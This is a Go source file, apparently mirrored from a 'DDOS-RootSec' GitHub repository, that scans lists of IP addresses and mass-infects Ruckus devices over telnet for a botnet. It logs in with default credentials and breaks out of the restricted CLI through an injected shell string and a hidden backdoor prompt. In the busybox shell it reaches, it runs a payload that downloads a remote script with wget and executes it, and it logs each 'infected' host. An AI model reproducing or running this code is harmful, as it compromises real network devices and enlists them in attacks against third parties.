Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Exploits/Ruckus/r.go
5038 views
1
package main

2


3
import (

4
	"bufio"

5
	"errors"

6
	"log"

7
	"net"

8
	"os"

9
	"strconv"

10
	"strings"

11
	"sync"

12
	"time"

13
)

14


15
var (	

16
	//all of our ports properly

17
	//this will ensure its done without errors

18
	Ports []int = []int{

19
		2323, 23, 24, //main port

20
	}

21


22
	//stores our payload properly

23
	Payload string = "rm -rf z.sh; cd tmp; wget http://ip/z.zh; chmod 777 z.sh;sh z.sh ruckus"

24
	EndingF string = "skid" //what your payload says once complete

25


26
	//stores all infected clients properly

27
	//this will ensure its done without errors

28
	infected int = 0

29


30
	//ignore this function properly

31
	//this will ensure we only finish when done

32
	wg sync.WaitGroup

33


34
	mux sync.Mutex

35
)

36


37
func main() {

38


39
	//reads from the file given

40
	//this will ensure its done properly

41
	scanner := bufio.NewScanner(os.Stdin)

42
	for scanner.Scan() {

43
		go func() { //sleeps goroutine

44
			executer := time.Now()

45
			//runs the executer properly

46
			//this will ensure its done properly

47
			if ip,err := RemoteExecute(scanner.Text()); err == nil { //renders the success message properly

48
				infected++ //adds an additional properly and safely onto the count properly

49
				log.Printf("[RUCKUS] Infected (%s) (%s) [%d]", ip, strconv.FormatFloat(time.Since(executer).Seconds(), 'f', 2, 64), infected)

50
			}

51
		}()

52
	}

53
	time.Sleep(10 * time.Second)

54
	wg.Wait() //waits for all to finish

55
}

56


57
//dials the host and runs our execution command

58
//this will ensure its done without errors happening

59
func RemoteExecute(target string) (string, error) { //err handles

60


61
	//checks len for valid target

62
	if len(target) <= 0 { //checks the length properly

63
		return "", errors.New("invalid target has been passed")

64
	}

65


66
	var Conn net.Conn = nil; wg.Add(1)

67
	defer wg.Done() //removes one from group

68
	//ranges through all of our possible ports

69
	//this will ensure we have a connection on one

70
	for _, Port := range Ports { //ranges through properly

71


72
		//dials the connection properly and safely

73
		//this will ensure its done properly and safely

74
		Connection, err := net.Dial("tcp", target+":"+strconv.Itoa(Port))

75
		if err != nil { //err handles properly and safely

76
			continue

77
		}

78


79
		//checks for the located connection

80
		//this will ensure we handle from there

81
		if Connection != nil { //checks for the connection

82
			Conn = Connection //saves into our memory for conn

83
		}

84
	}

85


86
	//this will ensure we dont ignore the conn

87
	//allows more safer connection without errors

88
	if Conn == nil { //err handles properly and safely

89
		return "", errors.New("couldn't dial the given target")

90
	}

91


92


93
	defer Conn.Close() //Close when function complete

94


95
	//tries to wait for the text properly

96
	//this will ensure we only run the next steps once complete

97
	if err := AwaitText(Conn, "Please login"); err != nil {

98
		return "", err //returns the error properly

99
	}

100


101


102
	//writes our login information properly

103
	//writes our main USERNAME into the remote host

104
	if _, err := Conn.Write([]byte("super\r\n")); err != nil {

105
		return "", err //returns the error properly

106
	}

107


108
	//tries to wait for the text properly

109
	//this will ensure we only run the next steps once complete

110
	if err := AwaitText(Conn, "password"); err != nil {

111
		return "", err //returns the error properly

112
	}

113


114
	//writes our main PASSWORD into the remote host

115
	//this will ensure its done without errors happening

116
	if _, err := Conn.Write([]byte("sp-admin\r\n")); err != nil {

117
		return "", err //returns the error properly

118
	}

119


120
	//checks if we have logged in properly

121
	//this will ensure its done without errors happening

122
	if err := AwaitText(Conn, "rkscli"); err != nil {

123
		return "", err //returns the error properly

124
	}

125


126
	//prints the success message properly and safely

127
	//this shall ensure its done without errors on purpose

128
	log.Printf("[RUCKUS] possible ruckus device located at %s\r\n", Conn.RemoteAddr().String())

129


130
	//resets the shell properly and safely

131
	//this will ensure its done without errors happening

132
	if _, err := Conn.Write([]byte("Ruckus\r\n")); err != nil {

133
		return "", err //returns the error properly

134
	}

135


136
	time.Sleep(1 * time.Second)

137


138
	//writes to our bin properly and safely

139
	//this will ensure its done without errors happening

140
	if _, err := Conn.Write([]byte("\";/bin/sh;\"\r\n")); err != nil {

141
		return "", err //returns the error properly

142
	}

143


144
	//checks if we have logged in properly

145
	//this will ensure its done without errors happening

146
	if err := AwaitText(Conn, "rkscli"); err != nil {

147
		return "", err //returns the error properly

148
	}

149


150
	//writes the last authentication prompt

151
	//this will ensure open our buzybox prompt

152
	if _, err := Conn.Write([]byte("!v54!\r\n")); err != nil {

153
		return "", err //returns the error properly

154
	}

155


156
	//awaits the text properly and safely

157
	//this will ensure we dont go futher without this

158
	if err := AwaitText(Conn, "What's your chow"); err != nil {

159
		return "", err //returns the error properly

160
	}

161


162
	//another clear enter properly

163
	//this will ensure its done without errors properly

164
	if _, err := Conn.Write([]byte("\r\n")); err != nil {

165
		return "", err //returns the error properly

166
	}

167


168
	//checks for the buzybox to opened properly

169
	//this will ensure its done without errors happening

170
	if err := AwaitText(Conn, "#"); err != nil {

171
		return "", err //returns the error properly

172
	}

173


174
	//runs our commands inside busybox

175
	//this will now ensure its done without errors

176
	if _, err := Conn.Write([]byte(Payload+"\r\n")); err != nil {

177
		return "", err //returns the error properly

178
	}

179


180
	//awaits properly and safely without issues happening

181
	if len(EndingF) > 0 { //checks for it to complete properly

182
		//awaits the ending command properly and safely

183
		//this will ensure its done without errors happeningt

184
		if err := AwaitText(Conn, EndingF); err != nil {

185
			return "", err //returns the error properly

186
		}

187
	} else { //sleeps for runtime of 10 secs

188
		time.Sleep(10 * time.Second) //sleeps properly

189
	}

190


191
	return Conn.RemoteAddr().String(), nil //returns nil

192
}

193


194
//awaits for the prompt given inside the string

195
//this will ensure we only complete once done properly

196
func AwaitText(c net.Conn, prompt string) error {

197
	//3 second read deadline properly

198
	//awaits 3 seconds before killing from device

199
	c.SetReadDeadline(time.Now().Add(15 * time.Second)) 

200
	for { //for loops input reading

201
		buf := make([]byte, 1024) //live buffer

202
		if _, err := c.Read(buf); err != nil {

203
			return err //returns the error

204
		}

205


206
		//detects if it contains properly

207
		//this will check if we have found the output

208
		if strings.Contains(strings.ReplaceAll(string(buf), "\x00", ""), prompt) {

209
			return nil //returns a nil pointer properly

210
		}

211
	}

212
}

213


214